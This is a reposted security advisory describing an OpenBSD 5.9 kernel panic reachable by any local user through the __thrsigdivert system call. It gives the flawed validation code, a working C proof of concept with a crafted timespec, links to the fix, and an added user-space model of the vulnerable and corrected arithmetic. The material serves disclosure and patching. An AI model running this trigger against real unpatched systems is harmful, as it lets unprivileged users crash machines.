OpenBSD 5.9 kernel panic through the __thrsigdivert system call Exploit
Source: vfocus.net  Author: vfocus  Published: 2016-07-18
/*
* thrsigdivert_panic.c
* Demonstrate a panic through the __thrsigdivert system call.
*
* gcc -g thrsigdivert_panic.c -o thrsigdivert_panic
*/
  
#ifdef BUG_WRITEUP //---------------------------------------------------
__thrsigdivert validation is insufficient and can lead to a panic.
  
Impact:
Any user can panic the OpenBSD kernel with the __thrsigdivert system call.
  
Description:
The __thrsigdivert system call allows a user to sleep for some amount
of time waiting for a signal. The system call validates the user-provided
parameters in sys___thrsigdivert() (kern/kern_sig.c) before calling to
lower layers to implement the sleep:
  
	if (ts.tv_nsec < 0 || ts.tv_nsec >= 1000000000)
		timeinvalid = 1;
	else {
		to_ticks = (long long)hz * ts.tv_sec +
		    ts.tv_nsec / (tick * 1000);
		if (to_ticks > INT_MAX)
			to_ticks = INT_MAX;
	}
  
This validation is insufficient. Some values of the user-provided
ts can lead to a negative to_ticks value after conversion. This
condition triggers a panic in timeout_add (kern/kern_timeout.c) when
the to_ticks value is checked to be positive:
  
	if (to_ticks < 0)
		panic("timeout_add: to_ticks (%d) < 0", to_ticks);
  
Reproduction:
Run the attached thrsigdivert_panic.c program. NCC verified that
it causes a panic on OpenBSD 5.9 GENERIC kernel on an x86_64 processor.
NCC Group was able to reproduce this issue on OpenBSD 5.9 release
running amd64.
  
Recommendation:
Return an error if ts.tv_sec is negative in sys___thrsigdivert.
Check to see if to_ticks is negative in sys___thrsigdivert
(kern/kern_sig.c) and, if so, saturate its value at INT_MAX, since
this indicates an overly large value.
  
Reported: 2016-07-05
Fixed: http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/sys/kern/kern_sig.c.diff?r1=1.200&r2=1.201
http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/sys/kern/kern_synch.c.diff?r1=1.132&r2=1.133
http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/sys/kern/kern_tc.c.diff?r1=1.28&r2=1.29
http://cvsweb.openbsd.org/cgi-bin/cvsweb/src/sys/kern/kern_timeout.c.diff?r1=1.47&r2=1.48
http://ftp.openbsd.org/pub/OpenBSD/patches/5.9/common/018_timeout.patch.sig
http://ftp.openbsd.org/pub/OpenBSD/patches/5.8/common/021_timeout.patch.sig
  
#endif // BUG_WRITEUP ---------------------------------------------------
  
#include <stdio.h>
#include <sys/signal.h>
#include <time.h>		/* struct timespec */

/* Raw system call; it is not declared in the public headers. */
int __thrsigdivert(sigset_t set, siginfo_t *info, const struct timespec *timeout);

int
main(int argc, char **argv)
{
	/* tv_sec is large enough that hz * tv_sec overflows inside the kernel,
	 * giving a negative to_ticks; tv_nsec is within the accepted range. */
	struct timespec tsp = { 0x687327fff5612f21, 0x63760a };
	siginfo_t info;

	__thrsigdivert(1, &info, &tsp);
	printf("nothing happened!\n");
	return 0;
}
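The conversion described in the Description and Recommendation sections above, modelled in user space as an added example that is not part of the NCC advisory or of the PoC: to_ticks_59() reproduces the 5.9 arithmetic and returns the int that would reach timeout_add(), while to_ticks_fixed() applies the recommended check. The names, the hz=100 and tick=10000 values, and the unsigned modelling of the kernel's signed wraparound are assumptions; no system call is made.

```c
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <time.h>
#define MODEL_HZ   100LL    /* assumed kernel hz */
#define MODEL_TICK 10000LL  /* assumed microseconds per tick */

/* 5.9 behaviour: *timo receives the int that would reach timeout_add().
 * The kernel's (long long)hz * tv_sec overflows for huge tv_sec; the wrap is
 * modelled with unsigned arithmetic and the casts truncate modulo 2^n. */
int to_ticks_59(const struct timespec *ts, int *timo)
{
	long long to_ticks;
	if (ts->tv_nsec < 0 || ts->tv_nsec >= 1000000000)
		return EINVAL;                      /* timeinvalid */
	to_ticks = (long long)((uint64_t)MODEL_HZ * (uint64_t)ts->tv_sec) +
	    ts->tv_nsec / (MODEL_TICK * 1000);
	if (to_ticks > INT_MAX)                 /* misses negative values */
		to_ticks = INT_MAX;
	*timo = (int)to_ticks;                  /* < 0 here => panic */
	return 0;
}

/* Recommended check: refuse a negative tv_sec and saturate to INT_MAX before
 * the multiply can wrap, so to_ticks can never come out negative. */
int to_ticks_fixed(const struct timespec *ts, int *timo)
{
	long long to_ticks = INT_MAX;
	if (ts->tv_nsec < 0 || ts->tv_nsec >= 1000000000 || ts->tv_sec < 0)
		return EINVAL;
	if (ts->tv_sec <= INT_MAX / MODEL_HZ) {
		to_ticks = MODEL_HZ * ts->tv_sec + ts->tv_nsec / (MODEL_TICK * 1000);
		if (to_ticks > INT_MAX)
			to_ticks = INT_MAX;
	}
	*timo = (int)to_ticks;
	return 0;
}

int main(void)
{
	/* The timespec from the PoC above. */
	struct timespec poc = { .tv_sec = 0x687327fff5612f21, .tv_nsec = 0x63760a };
	int t59 = 0, tfix = 0;
	to_ticks_59(&poc, &t59);
	to_ticks_fixed(&poc, &tfix);
	printf("5.9 model: %d (%s), fixed: %d\n", t59, t59 < 0 ? "panic" : "ok", tfix);
	return 0;
}
```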